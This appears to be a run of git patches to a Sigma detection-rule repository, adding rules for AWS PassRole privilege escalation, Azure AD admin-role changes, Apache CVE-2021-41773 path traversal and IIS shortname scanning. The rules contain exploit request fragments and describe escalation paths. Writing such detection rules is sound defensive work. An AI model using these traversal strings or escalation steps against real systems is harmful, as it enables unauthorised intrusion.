0becb7a6..465ddfb2 100644 --- a/tools/sigma/backends/mdatp.py +++ b/tools/sigma/backends/mdatp.py @@ -15,6 +15,7 @@ # along with this program. If not, see . import re +import sigma from functools import wraps from .base import SingleTextQueryBackend from .exceptions import NotSupportedError @@ -416,3 +417,23 @@ class WindowsDefenderATPBackend(SingleTextQueryBackend): return self.generateMapItemTypedNode(mapping[0], value) return super().generateMapItemNode(node) + + def generateAggregation(self, agg): + if agg == None: + return "" + if agg.aggfunc == sigma.parser.condition.SigmaAggregationParser.AGGFUNC_NEAR: + raise NotImplementedError("The 'near' aggregation operator is not yet implemented for this backend") + if agg.groupfield == None: + if agg.aggfunc_notrans == 'count': + if agg.aggfield == None : + return " | summarize val=count() | where val %s %s" % (agg.cond_op, agg.condition) + else: + agg.aggfunc_notrans = 'dcount' + return " | summarize val=%s(%s) as val | where val %s %s" % (agg.aggfunc_notrans, agg.aggfield or "", agg.cond_op, agg.condition) + else: + if agg.aggfunc_notrans == 'count': + if agg.aggfield == None : + return " | summarize val=count() by %s | where val %s %s" % (agg.groupfield, agg.cond_op, agg.condition) + else: + agg.aggfunc_notrans = 'dcount' + return " | summarize val=%s(%s) by %s | where val %s %s" % (agg.aggfunc_notrans, agg.aggfield or "", agg.groupfield or "", agg.cond_op, agg.condition) From 92b1ce4cf428d756b16c3159b21f645fd196a5df Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 3 Oct 2021 22:54:01 -0500 Subject: [PATCH 1162/1367] Create pass_role_to_lambda_function.yml --- .../aws/pass_role_to_lambda_function.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/cloud/aws/pass_role_to_lambda_function.yml diff --git a/rules/cloud/aws/pass_role_to_lambda_function.yml b/rules/cloud/aws/pass_role_to_lambda_function.yml new file mode 100644 index 00000000..013ca204 --- /dev/null +++ b/rules/cloud/aws/pass_role_to_lambda_function.yml @@ -0,0 +1,28 @@ +title: AWS Passed Role to Lambda Function +id: d914951b-52c8-485f-875e-86abab710c0b +description: Detects when an user with these permissions could escalate privileges by passing an existing IAM role to a new Lmbda function that includes code to import the AWS library to their programming lanugage. This can give access to the privileges associated with any Lambda service role that exists in the account and escalate to full administrator access to the account. +author: Austin Songer @austinsonger +status: experimental +date: 2021/10/03 +references: + - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ +logsource: + service: cloudtrail +detection: + selection1: + eventSource: iam.amazonaws.com + eventName: PassRole + selection2: + eventSource: lambda.amazonaws.com + eventName: CreateFunction + selection3: + eventSource: lambda.amazonaws.com + eventName: InvokeFunction + condition: all +level: low +tags: + - attack.privilege_escalation + - attack.t1078 +falsepositives: + - Passed Role to New Lambda Function may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - If known behavior is causing false positives, it can be exempted from the rule. From 60eccf711de6b2556deb1569a16f8b1128c02641 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 3 Oct 2021 22:54:19 -0500 Subject: [PATCH 1163/1367] Rename pass_role_to_lambda_function.yml to aws_pass_role_to_lambda_function.yml --- ...o_lambda_function.yml => aws_pass_role_to_lambda_function.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/aws/{pass_role_to_lambda_function.yml => aws_pass_role_to_lambda_function.yml} (100%) diff --git a/rules/cloud/aws/pass_role_to_lambda_function.yml b/rules/cloud/aws/aws_pass_role_to_lambda_function.yml similarity index 100% rename from rules/cloud/aws/pass_role_to_lambda_function.yml rename to rules/cloud/aws/aws_pass_role_to_lambda_function.yml From d694d6faa83e6530c0c22546794c5e35c991537b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 3 Oct 2021 23:03:39 -0500 Subject: [PATCH 1164/1367] Create passed_role_to_glue_development_endpoint.yml --- ...ssed_role_to_glue_development_endpoint.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/cloud/aws/passed_role_to_glue_development_endpoint.yml diff --git a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml new file mode 100644 index 00000000..ff46be0a --- /dev/null +++ b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml @@ -0,0 +1,25 @@ +title: AWS Passed Role to Glue Development Endpoint +id: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26 +description: Detects when an user these permissions could create a new AWS Glue development endpoint and pass an existing service role to it. They then could SSH into the instance and use the AWS CLI to have access of the permissions the role has access to. The adversary could gain privileges associated with any Glue service role that exists in the account, which could range from no privilege escalation to full administrator access to the account. +author: Austin Songer @austinsonger +status: experimental +date: 2021/10/03 +references: + - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ + - https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html +logsource: + service: cloudtrail +detection: + selection1: + eventSource: lambda.amazonaws.com + eventName: PassRole + selection2: + eventSource: glue.amazonaws.com + eventName: CreateDevEndpoint + condition: all +level: low +tags: + - attack.privilege_escalation +falsepositives: + - Passed Role to Glue Development Endpoint may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - If known behavior is causing false positives, it can be exempted from the rule. From 96f05f7f191c646460ae2abacf28d13eca619d8f Mon Sep 17 00:00:00 2001 From: MetallicHack <35694352+MetallicHack@users.noreply.github.com> Date: Mon, 4 Oct 2021 15:25:55 +0200 Subject: [PATCH 1165/1367] Update azure_ad_user_added_to_sensitive_role.yml --- .../azure_ad_user_added_to_sensitive_role.yml | 24 ++++++++++++++++++- 1 file changed, 23 insertions(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml b/rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml index 9daeafb9..47743d9e 100644 --- a/rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml +++ b/rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml @@ -1 +1,23 @@ -test +title: User added to an administrator's Azure AD role +id: ebbeb024-5b1d-4e16-9c0c-917f86c708a7 +description: Detect when an user is added to an administrator's Azure AD role +author: Raphaël CALVET, @MetallicHack +date: 2021/10/04 +references: + - https://attack.mitre.org/techniques/T1098/003/ + - https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/ +logsource: + service: azure.activitylogs +detection: + selection: + Operation: 'Add member to role.' + Workload: 'AzureActiveDirectory' + ModifiedProperties{}.NewValue|endswith: + - 'Admins' + - 'Administrator' + condition: selection +falsepositives: + - PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled. +level: medium +status: experimental +tags: persistence From fe439e1998dd1b42ef6ee748801b110992b9b5c9 Mon Sep 17 00:00:00 2001 From: MetallicHack <35694352+MetallicHack@users.noreply.github.com> Date: Mon, 4 Oct 2021 15:26:58 +0200 Subject: [PATCH 1166/1367] Rename azure_ad_user_added_to_sensitive_role.yml to azure_ad_user_added_to_admin_role.yml --- ...o_sensitive_role.yml => azure_ad_user_added_to_admin_role.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/azure/{azure_ad_user_added_to_sensitive_role.yml => azure_ad_user_added_to_admin_role.yml} (100%) diff --git a/rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml b/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml similarity index 100% rename from rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml rename to rules/cloud/azure/azure_ad_user_added_to_admin_role.yml From 759a715198b726ded11c84e85ce7b44a94a30f00 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 4 Oct 2021 20:34:45 +0200 Subject: [PATCH 1167/1367] Add logsource to duplicate logic test --- tests/test_rules.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tests/test_rules.py b/tests/test_rules.py index 370e944b..3354ba87 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -219,6 +219,8 @@ class TestRules(unittest.TestCase): for file in self.yield_next_rule_file_path(self.path_to_rules): detection = self.get_rule_part(file_path = file, part_name = "detection") + logsource = self.get_rule_part(file_path = file, part_name = "logsource") + detection.update(logsource) yaml = self.get_rule_yaml(file_path = file) is_multipart_yaml_file = len(yaml) != 1 From fd329f4f9b3fa0aa19f974051cf02852e168587d Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 4 Oct 2021 21:25:57 +0200 Subject: [PATCH 1168/1367] Remove unneeded EventID --- rules/windows/file_event/win_rclone_exec_file.yml | 3 +-- .../windows/image_load/image_load_silenttrinity_stage_use.yml | 3 +-- .../network_connection/sysmon_regsvr32_network_activity.yml | 1 - 3 files changed, 2 insertions(+), 5 deletions(-) diff --git a/rules/windows/file_event/win_rclone_exec_file.yml b/rules/windows/file_event/win_rclone_exec_file.yml index fa47e324..d4323607 100644 --- a/rules/windows/file_event/win_rclone_exec_file.yml +++ b/rules/windows/file_event/win_rclone_exec_file.yml @@ -3,7 +3,7 @@ id: 34986307-b7f4-49be-92f3-e7a4d01ac5db description: Detects Rclone config file being created status: experimental date: 2021/05/26 -modified: 2021/06/27 +modified: 2021/10/04 author: Aaron Greetham (@beardofbinary) - NCC Group references: - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ @@ -18,7 +18,6 @@ logsource: category: file_event detection: file_selection: - EventID: 11 TargetFilename|contains|all: - ':\Users\' - '\.config\rclone\' diff --git a/rules/windows/image_load/image_load_silenttrinity_stage_use.yml b/rules/windows/image_load/image_load_silenttrinity_stage_use.yml index fd1358b0..806fee1f 100644 --- a/rules/windows/image_load/image_load_silenttrinity_stage_use.yml +++ b/rules/windows/image_load/image_load_silenttrinity_stage_use.yml @@ -9,7 +9,7 @@ references: - https://github.com/byt3bl33d3r/SILENTTRINITY author: Aleksey Potapov, oscd.community date: 2019/10/22 -modified: 2021/09/19 +modified: 2021/10/04 tags: - attack.command_and_control logsource: @@ -17,7 +17,6 @@ logsource: product: windows detection: selection: - EventID: 11 # to pass the test otherwise block as same detection that 75c505b1-711d-4f68-a357-8c3fe37dbf2d Description|contains: 'st2stager' condition: selection falsepositives: diff --git a/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml b/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml index 4fed79c6..ade7b307 100644 --- a/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml +++ b/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml @@ -21,7 +21,6 @@ logsource: product: windows detection: selection: - EventID: 3 # need to pass the test "There are rule files with exactly the same detection logic" Image|endswith: '\regsvr32.exe' condition: selection fields: From 654b5b4bff0717d82ab2fc7a09e764a8ab7496f6 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 4 Oct 2021 22:08:47 +0200 Subject: [PATCH 1169/1367] Update win_lolbas_execution_of_nltest.yml --- .../windows/process_creation/win_lolbas_execution_of_nltest.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_lolbas_execution_of_nltest.yml b/rules/windows/process_creation/win_lolbas_execution_of_nltest.yml index f95ad5b8..041d524b 100644 --- a/rules/windows/process_creation/win_lolbas_execution_of_nltest.yml +++ b/rules/windows/process_creation/win_lolbas_execution_of_nltest.yml @@ -2,7 +2,7 @@ title: Correct Execution of Nltest.exe id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 status: experimental author: Arun Chauhan -date: 2021/08/24 +date: 2021/10/04 description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions. references: - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm From 4f86a245f82dcee4256d1545a905fe1d53e0bc17 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 5 Oct 2021 07:30:43 +0200 Subject: [PATCH 1170/1367] Order file i correct directory --- .../win_lolbas_execution_of_nltest.yml | 0 ...nt_executable_and_script_creation_by_office_using_file_ext.yml | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename rules/windows/{process_creation => builtin}/win_lolbas_execution_of_nltest.yml (100%) rename rules/windows/{process_creation => file_event}/file_event_executable_and_script_creation_by_office_using_file_ext.yml (100%) diff --git a/rules/windows/process_creation/win_lolbas_execution_of_nltest.yml b/rules/windows/builtin/win_lolbas_execution_of_nltest.yml similarity index 100% rename from rules/windows/process_creation/win_lolbas_execution_of_nltest.yml rename to rules/windows/builtin/win_lolbas_execution_of_nltest.yml diff --git a/rules/windows/process_creation/file_event_executable_and_script_creation_by_office_using_file_ext.yml b/rules/windows/file_event/file_event_executable_and_script_creation_by_office_using_file_ext.yml similarity index 100% rename from rules/windows/process_creation/file_event_executable_and_script_creation_by_office_using_file_ext.yml rename to rules/windows/file_event/file_event_executable_and_script_creation_by_office_using_file_ext.yml From 80d09483d96a374091e6f8a4d4312b55696a0ab6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 5 Oct 2021 07:33:50 +0200 Subject: [PATCH 1171/1367] move to builtin --- .../win_susp_multiple_files_renamed_or_deleted.yml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/{file_event => builtin}/win_susp_multiple_files_renamed_or_deleted.yml (100%) diff --git a/rules/windows/file_event/win_susp_multiple_files_renamed_or_deleted.yml b/rules/windows/builtin/win_susp_multiple_files_renamed_or_deleted.yml similarity index 100% rename from rules/windows/file_event/win_susp_multiple_files_renamed_or_deleted.yml rename to rules/windows/builtin/win_susp_multiple_files_renamed_or_deleted.yml From 3b014259369fa07eaf301e770baa2131174c0822 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 5 Oct 2021 07:40:42 +0200 Subject: [PATCH 1172/1367] Update aws_pass_role_to_lambda_function.yml --- rules/cloud/aws/aws_pass_role_to_lambda_function.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_pass_role_to_lambda_function.yml b/rules/cloud/aws/aws_pass_role_to_lambda_function.yml index 013ca204..333b6596 100644 --- a/rules/cloud/aws/aws_pass_role_to_lambda_function.yml +++ b/rules/cloud/aws/aws_pass_role_to_lambda_function.yml @@ -1,5 +1,5 @@ title: AWS Passed Role to Lambda Function -id: d914951b-52c8-485f-875e-86abab710c0b +id: d914951b-52c8-485f-875e-86abab710c0b description: Detects when an user with these permissions could escalate privileges by passing an existing IAM role to a new Lmbda function that includes code to import the AWS library to their programming lanugage. This can give access to the privileges associated with any Lambda service role that exists in the account and escalate to full administrator access to the account. author: Austin Songer @austinsonger status: experimental From ad9362e043131ca57ec780171d05ea02e90f8f13 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 5 Oct 2021 07:41:41 +0200 Subject: [PATCH 1173/1367] Update passed_role_to_glue_development_endpoint.yml --- rules/cloud/aws/passed_role_to_glue_development_endpoint.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml index ff46be0a..b57a5500 100644 --- a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml +++ b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml @@ -1,5 +1,5 @@ title: AWS Passed Role to Glue Development Endpoint -id: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26 +id: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26 description: Detects when an user these permissions could create a new AWS Glue development endpoint and pass an existing service role to it. They then could SSH into the instance and use the AWS CLI to have access of the permissions the role has access to. The adversary could gain privileges associated with any Glue service role that exists in the account, which could range from no privilege escalation to full administrator access to the account. author: Austin Songer @austinsonger status: experimental @@ -13,7 +13,7 @@ detection: selection1: eventSource: lambda.amazonaws.com eventName: PassRole - selection2: + selection2: eventSource: glue.amazonaws.com eventName: CreateDevEndpoint condition: all From a4100e76b9f1cec722758925169ac9754a720963 Mon Sep 17 00:00:00 2001 From: MetallicHack <35694352+MetallicHack@users.noreply.github.com> Date: Tue, 5 Oct 2021 09:39:03 +0200 Subject: [PATCH 1174/1367] change title and tags in order to match sigmarules --- rules/cloud/azure/azure_ad_user_added_to_admin_role.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml b/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml index 47743d9e..6d2a27b0 100644 --- a/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml +++ b/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml @@ -1,4 +1,4 @@ -title: User added to an administrator's Azure AD role +title: User Added to an Administrator's Azure AD Role id: ebbeb024-5b1d-4e16-9c0c-917f86c708a7 description: Detect when an user is added to an administrator's Azure AD role author: Raphaël CALVET, @MetallicHack @@ -20,4 +20,6 @@ falsepositives: - PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled. level: medium status: experimental -tags: persistence +tags: + - attack.persistence + - attack.t1098.003 From 030fc2a03ef94923f2cce869669cb67b4f4df93d Mon Sep 17 00:00:00 2001 From: MetallicHack <35694352+MetallicHack@users.noreply.github.com> Date: Tue, 5 Oct 2021 09:40:25 +0200 Subject: [PATCH 1175/1367] change title and tags in order to match sigmarules --- rules/cloud/azure/azure_ad_user_added_to_admin_role.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml b/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml index 6d2a27b0..ce6c956b 100644 --- a/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml +++ b/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml @@ -1,6 +1,6 @@ title: User Added to an Administrator's Azure AD Role id: ebbeb024-5b1d-4e16-9c0c-917f86c708a7 -description: Detect when an user is added to an administrator's Azure AD role +description: User Added to an Administrator's Azure AD Role author: Raphaël CALVET, @MetallicHack date: 2021/10/04 references: From 4ae3ece31413db6dd6b863b4f21924990d59e84f Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Tue, 5 Oct 2021 14:08:40 +0100 Subject: [PATCH 1176/1367] Update AWS SAML and Lambda rules Use correct case for `AssumeRoleWithSAML` event name. `UpdateFunctionConfiguration`, `UpdateFunctionConfiguration20150331` and `UpdateFunctionConfiguration20150331v2` are all valid event names for updating Lambda function configuration, added selection condition for any of these. --- rules/cloud/aws/aws_attached_malicious_lambda_layer.yml | 7 ++++++- rules/cloud/aws/aws_suspicious_saml_activity.yml | 2 +- 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml index 7c97e8d2..09789d35 100644 --- a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml +++ b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml @@ -11,8 +11,13 @@ logsource: detection: selection: eventSource: lambda.amazonaws.com + filter1: eventName: UpdateFunctionConfiguration - condition: selection + filter2: + eventName: UpdateFunctionConfiguration20150331 + filter3: + eventName: UpdateFunctionConfiguration20150331v2 + condition: selection and (filter1 or filter2 or filter3) level: medium tags: - attack.privilege_escalation diff --git a/rules/cloud/aws/aws_suspicious_saml_activity.yml b/rules/cloud/aws/aws_suspicious_saml_activity.yml index 0b27875a..f8b542be 100644 --- a/rules/cloud/aws/aws_suspicious_saml_activity.yml +++ b/rules/cloud/aws/aws_suspicious_saml_activity.yml @@ -12,7 +12,7 @@ logsource: detection: selection1: eventSource: sts.amazonaws.com - eventName: Assumerolewithsaml + eventName: AssumeRoleWithSAML selection2: eventSource: iam.amazonaws.com eventName: UpdateSAMLProvider From 482df0a0add5a2d7f77b6919aec09292f98652ef Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 5 Oct 2021 17:33:37 +0200 Subject: [PATCH 1177/1367] rule: Apache Vuln CVE-2021-41773 --- ...b_cve_2021_41773_apache_path_traversal.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/web/web_cve_2021_41773_apache_path_traversal.yml diff --git a/rules/web/web_cve_2021_41773_apache_path_traversal.yml b/rules/web/web_cve_2021_41773_apache_path_traversal.yml new file mode 100644 index 00000000..b44021b3 --- /dev/null +++ b/rules/web/web_cve_2021_41773_apache_path_traversal.yml @@ -0,0 +1,28 @@ +title: CVE-2010-5278 Exploitation Attempt +id: 3007fec6-e761-4319-91af-e32e20ac43f5 +status: experimental +description: Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. +author: daffainfo +date: 2021/10/05 +references: + - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 + - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 + - https://twitter.com/ptswarm/status/1445376079548624899 + - https://twitter.com/h4x0r_dz/status/1445401960371429381 + - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-41773.yaml +logsource: + category: webserver +detection: + selection: + c-uri|contains: '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e' + selection_success: + sc-status: + - 200 + - 301 + condition: selection and selection_success +false_positives: + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical From 5576f5047037546b4474e6089ff571968a873e12 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 5 Oct 2021 17:35:09 +0200 Subject: [PATCH 1178/1367] fix: title, add my name --- rules/web/web_cve_2021_41773_apache_path_traversal.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/web/web_cve_2021_41773_apache_path_traversal.yml b/rules/web/web_cve_2021_41773_apache_path_traversal.yml index b44021b3..118ecf20 100644 --- a/rules/web/web_cve_2021_41773_apache_path_traversal.yml +++ b/rules/web/web_cve_2021_41773_apache_path_traversal.yml @@ -1,8 +1,8 @@ -title: CVE-2010-5278 Exploitation Attempt +title: CVE-2021-41773 Exploitation Attempt id: 3007fec6-e761-4319-91af-e32e20ac43f5 status: experimental description: Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. -author: daffainfo +author: daffainfo, Florian Roth date: 2021/10/05 references: - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 From d9e5da6c8691e770fb25d2169711cf36d64f907c Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Tue, 5 Oct 2021 17:52:52 +0100 Subject: [PATCH 1179/1367] Use startswith for eventName selection Signed-off-by: Rachel Rice --- rules/cloud/aws/aws_attached_malicious_lambda_layer.yml | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) diff --git a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml index 09789d35..597b668d 100644 --- a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml +++ b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml @@ -11,13 +11,8 @@ logsource: detection: selection: eventSource: lambda.amazonaws.com - filter1: - eventName: UpdateFunctionConfiguration - filter2: - eventName: UpdateFunctionConfiguration20150331 - filter3: - eventName: UpdateFunctionConfiguration20150331v2 - condition: selection and (filter1 or filter2 or filter3) + eventName|startswith: UpdateFunctionConfiguration + condition: selection level: medium tags: - attack.privilege_escalation From 7cf01c2f0c9e02fc84da2be085092f3d9061e46f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 6 Oct 2021 12:43:10 +0200 Subject: [PATCH 1180/1367] extended CVE-2021-41773 rule --- rules/web/web_cve_2021_41773_apache_path_traversal.yml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/rules/web/web_cve_2021_41773_apache_path_traversal.yml b/rules/web/web_cve_2021_41773_apache_path_traversal.yml index 118ecf20..04ab1634 100644 --- a/rules/web/web_cve_2021_41773_apache_path_traversal.yml +++ b/rules/web/web_cve_2021_41773_apache_path_traversal.yml @@ -4,17 +4,21 @@ status: experimental description: Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. author: daffainfo, Florian Roth date: 2021/10/05 +modified: 2021/10/06 references: - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - https://twitter.com/ptswarm/status/1445376079548624899 - https://twitter.com/h4x0r_dz/status/1445401960371429381 - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-41773.yaml + - https://twitter.com/bl4sty/status/1445462677824761878?s=12 logsource: category: webserver detection: selection: - c-uri|contains: '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e' + c-uri|contains: + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e' + - '/icons/.%2e/%2e%2e/%2e%2e/%2e%2e' selection_success: sc-status: - 200 @@ -26,3 +30,4 @@ tags: - attack.initial_access - attack.t1190 level: critical + From dfd316c0ce2f11b223753c4ab3b8a2b8753b4f37 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 6 Oct 2021 17:46:15 +0200 Subject: [PATCH 1181/1367] Add web_iis_tilt_shortname_scan.yml --- rules/web/web_iis_tilt_shortname_scan.yml | 30 +++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/web/web_iis_tilt_shortname_scan.yml diff --git a/rules/web/web_iis_tilt_shortname_scan.yml b/rules/web/web_iis_tilt_shortname_scan.yml new file mode 100644 index 00000000..c97b5ed1 --- /dev/null +++ b/rules/web/web_iis_tilt_shortname_scan.yml @@ -0,0 +1,30 @@ +title: Successful IIS Shortname Fuzzing Scan +id: 7cb02516-6d95-4ffc-8eee-162075e111ac +status: experimental +author: frack113 +description: When IIS uses an old .Net Framework it's possible to enumeration folder with the symbol ~. +references: + - https://github.com/projectdiscovery/nuclei-templates/blob/master/fuzzing/iis-shortname.yaml + - https://www.exploit-db.com/exploits/19525 + - https://github.com/lijiejie/IIS_shortname_Scanner +date: 2021/10/06 +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection: + c-uri|contains: '~1' + c-uri|endswith: 'a.aspx' + cs-method: + - GET + - OPTIONS + #only succes + sc-status: + - 200 + - 301 + condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file From 930d2d4223667564ecfcf1f91b0b3fe7ee8809d1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 6 Oct 2021 17:53:16 +0200 Subject: [PATCH 1182/1367] fix id --- rules/web/web_iis_tilt_shortname_scan.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/web/web_iis_tilt_shortname_scan.yml b/rules/web/web_iis_tilt_shortname_scan.yml index c97b5ed1..eebef627 100644 --- a/rules/web/web_iis_tilt_shortname_scan.yml +++ b/rules/web/web_iis_tilt_shortname_scan.yml @@ -1,5 +1,5 @@ title: Successful IIS Shortname Fuzzing Scan -id: 7cb02516-6d95-4ffc-8eee-162075e111ac +id: 7cb02516-6d95-4ffc-8eee-162075e111ac status: experimental author: frack113 description: When IIS uses an old .Net Framework it's possible to enumeration folder with the symbol ~. From 0d04b469f77815e6d99d121c46cad8a1e3b68964 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 7 Oct 2021 07:40:53 +0200 Subject: [PATCH 1183/1367] order powershell_classic --- .../powershell_classic_alternate_powershell_hosts.yml | 0 .../{ => powershell_classic}/powershell_classic_powercat.yml | 0 .../powershell_classic_remote_powershell_session.yml | 0 .../powershell_classic_susp_athremotefxvgpudisablementcommand.yml | 0 .../powershell_classic_susp_zip_compress.yml | 0 .../powershell_classic_suspicious_download.yml | 0 .../powershell_delete_volume_shadow_copies.yml | 0 .../{ => powershell_classic}/powershell_downgrade_attack.yml | 0 .../{ => powershell_classic}/powershell_exe_calling_ps.yml | 0 .../{ => powershell_classic}/powershell_renamed_powershell.yml | 0 .../powershell_tamper_with_windows_defender.yml | 0 .../powershell_wsman_com_provider_no_powershell.yml | 0 .../{ => powershell_classic}/powershell_xor_commandline.yml | 0 .../{ => powershell_script}/powershell_accessing_win_api.yml | 0 14 files changed, 0 insertions(+), 0 deletions(-) rename rules/windows/powershell/{ => powershell_classic}/powershell_classic_alternate_powershell_hosts.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_classic_powercat.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_classic_remote_powershell_session.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_classic_susp_athremotefxvgpudisablementcommand.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_classic_susp_zip_compress.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_classic_suspicious_download.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_delete_volume_shadow_copies.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_downgrade_attack.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_exe_calling_ps.yml (100%) rename rules/windows/powershell/{ => 